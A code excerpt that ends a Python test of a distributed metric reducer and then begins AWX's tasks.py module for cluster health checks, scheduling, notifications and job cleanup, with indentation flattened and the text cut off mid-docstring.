reducer_context = _PyTorchReducerContext(distributed_context._zmq_allgather)
# reducer_context.wrap_reducer(lambda x: x, "dummy")
wrapped_reducer = reducer_context.wrap_reducer(dummy_reducer)
return DummyDistributedReducerContext(distributed_context, reducer_context, wrapped_reducer)
trials = do_parallel(make_reducer_context)
def get_batch_list(
rank: int, batch_size: int, num_workers: int, seq: List[int]
) -> List[List[int]]:
total_batches = (len(seq) + (batch_size - 1)) // batch_size
my_batch_indices = [i for i in range(total_batches) if i % num_workers == rank]
all_batches = [
seq[batch_size * k : min(batch_size * k + batch_size, len(seq))]
for k in range(total_batches)
]
return [b for i, b in enumerate(all_batches) if i in my_batch_indices]
observations = list(range(dataset_size))
for rank, trial in enumerate(trials):
for batch in get_batch_list(rank, 2, len(trials), observations):
trial.wrapped_reducer.update(batch)
results = do_parallel(lambda rank, _, __: trials[rank].reducer_context.reduce_metrics(False))
logger.debug(results)
# Close all distributed contexts
for trial in trials:
trial.distributed_context.close()
for i, result in enumerate(results):
assert result["sum"] == dataset_size * (dataset_size - 1) // 2
assert all(
i == v for i, v in enumerate(result["values"])
), f"result[{i}]={result} is not in original order"
|
tasks.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple, deque
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# dateutil
from dateutil.parser import parse as parse_date
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV, MINIMAL_EVENTS
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils.common import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
create_partition,
)
from awx.main.utils.execution_environments import get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.utils.receptor import get_receptor_ctl, worker_info, get_conn_type, get_tls_client
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
logger = logging.getLogger('awx.main.tasks')
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on loggins settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.mark_offline(update_last_seen=True, errors=_('Instance received normal shutdown signal'))
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
exclude_type = 'execution' if g.obj.name == settings.DEFAULT_CONTROL_PLANE_QUEUE_NAME else 'control'
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.node_type == exclude_type:
continue # never place execution instances in controlplane group or control instances in other groups
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
exclude_type = 'execution' if g.obj.name == settings.DEFAULT_CONTROL_PLANE_QUEUE_NAME else 'control'
candidate_pool_ct = len([i for i in actual_instances if i.obj.node_type != exclude_type])
if not candidate_pool_ct:
continue
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.node_type == exclude_type:
continue
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / candidate_pool_ct >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_health_check(node):
'''
Used for the health check endpoint, refreshes the status of the instance, but must be ran on target node
'''
if node == '':
logger.warn('Local health check incorrectly called with blank string')
return
elif node != settings.CLUSTER_HOST_ID:
logger.warn(f'Local health check for {node} incorrectly sent to {settings.CLUSTER_HOST_ID}')
return
try:
this_inst = Instance.objects.me()
except Instance.DoesNotExist:
logger.warn(f'Instance record for {node} missing, could not check capacity.')
return
this_inst.local_health_check()
@task(queue=get_local_queuename)
def execution_node_health_check(node):
if node == '':
logger.warn('Remote health check incorrectly called with blank string')
return
try:
instance = Instance.objects.get(hostname=node)
except Instance.DoesNotExist:
logger.warn(f'Instance record for {node} missing, could not check capacity.')
return
if instance.node_type != 'execution':
raise RuntimeError(f'Execution node health check ran against {instance.node_type} node {instance.hostname}')
data = worker_info(node, work_type='ansible-runner' if instance.node_type == 'execution' else 'local')
prior_capacity = instance.capacity
instance.save_health_data(
version='ansible-runner-' + data.get('runner_version', '???'),
cpu=data.get('cpu_count', 0),
memory=data.get('mem_in_bytes', 0),
uuid=data.get('uuid'),
errors='\n'.join(data.get('errors', [])),
)
if data['errors']:
formatted_error = "\n".join(data["errors"])
if prior_capacity:
logger.warn(f'Health check marking execution node {node} as lost, errors:\n{formatted_error}')
else:
logger.info(f'Failed to find capacity of new or lost execution node {node}, errors:\n{formatted_error}')
else:
logger.info('Set capacity of execution node {} to {}, worker info data:\n{}'.format(node, instance.capacity, json.dumps(data, indent=2)))
return data
def inspect_execution_nodes(instance_list):
with advisory_lock('inspect_execution_nodes_lock', wait=False):
node_lookup = {}
for inst in instance_list:
if inst.node_type == 'execution':
node_lookup[inst.hostname] = inst
ctl = get_receptor_ctl()
connections = ctl.simple_command('status')['Advertisements']
nowtime = now()
for ad in connections:
hostname = ad['NodeID']
commands = ad.get('WorkCommands') or []
if 'ansible-runner' not in commands:
continue
changed = False
if hostname in node_lookup:
instance = node_lookup[hostname]
elif settings.MESH_AUTODISCOVERY_ENABLED:
defaults = dict(enabled=False)
(changed, instance) = Instance.objects.register(hostname=hostname, node_type='execution', defaults=defaults)
logger.warn(f"Registered execution node '{hostname}' (marked disabled by default)")
else:
logger.warn(f"Unrecognized node on mesh advertising ansible-runner work type: {hostname}")
was_lost = instance.is_lost(ref_time=nowtime)
last_seen = parse_date(ad['Time'])
if instance.last_seen and instance.last_seen >= last_seen:
continue
instance.last_seen = last_seen
instance.save(update_fields=['last_seen'])
if changed:
execution_node_health_check.apply_async([hostname])
elif was_lost:
# if the instance *was* lost, but has appeared again,
# attempt to re-establish the initial capacity and version
# check
logger.warn(f'Execution node attempting to rejoin as instance {hostname}.')
execution_node_health_check.apply_async([hostname])
elif instance.capacity == 0:
# nodes with proven connection but need remediation run health checks are reduced frequency
if not instance.last_health_check or (nowtime - instance.last_health_check).total_seconds() >= settings.EXECUTION_NODE_REMEDIATION_CHECKS:
# Periodically re-run the health check of errored nodes, in case someone fixed it
# TODO: perhaps decrease the frequency of these checks
logger.debug(f'Restarting health check for execution node {hostname} with known errors.')
execution_node_health_check.apply_async([hostname])
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
for inst in instance_list:
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
break
else:
(changed, this_inst) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower control node '{}'".format(this_inst.hostname))
inspect_execution_nodes(instance_list)
for inst in list(instance_list):
if inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.local_health_check()
if startup_event and this_inst.capacity != 0:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shutdown services
for other_inst in instance_list:
if other_inst.version == "" or other_inst.version.startswith('ansible-runner') or other_inst.node_type == 'execution':
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisining is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.mark_offline(errors=_('Another cluster node has determined this instance to be unresponsive'))
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.last_seen))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_receptor_workunit_reaper():
"""
When an AWX job is launched via receptor, files such as status, stdin, and stdout are created
in a specific receptor directory. This directory on disk is a random 8 character string, e.g. qLL2JFNT
This is also called the work Unit ID in receptor, and is used in various receptor commands,
e.g. "work results qLL2JFNT"
After an AWX job executes, the receptor work unit directory is cleaned up by
issuing the work release command. In some cases the release process might fail, or
if AWX crashes during a job's execution, the work release command is never issued to begin with.
As such, this periodic task will obtain a list of all receptor work units, and find which ones
belong to AWX jobs that are in a completed state (status is canceled, error, or succeeded).
This task will call "work release" on each of these work units to clean up the files on disk.
"""
if not settings.RECEPTOR_RELEASE_WORK:
return
logger.debug("Checking for unreleased receptor work units")
receptor_ctl = get_receptor_ctl()
receptor_work_list = receptor_ctl.simple_command("work list")
unit_ids = [id for id in receptor_work_list]
jobs_with_unreleased_receptor_units = UnifiedJob.objects.filter(work_unit_id__in=unit_ids).exclude(status__in=ACTIVE_STATES)
for job in jobs_with_unreleased_receptor_units:
logger.debug(f"{job.log_format} is not active, reaping receptor work unit {job.work_unit_id}")
receptor_ctl.simple_command(f"work release {job.work_unit_id}")
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
self.job_created = None
self.recent_event_timings = deque(maxlen=settings.MAX_WEBSOCKET_EVENT_RATE)
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"process_isolation_executable": "podman", # need to provide, runner enforces default via argparse
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
verify_ssl = cred.get_input('verify_ssl')
params['container_auth_data'] = {'host': host, 'username': username, 'password': password, 'verify_ssl': verify_ssl}
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Using z allows the dir to mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(path)
# Ansible runner requires that project exists,
# and we will write files in the other folders without pre-creating the folder
for subfolder in ('project', 'inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
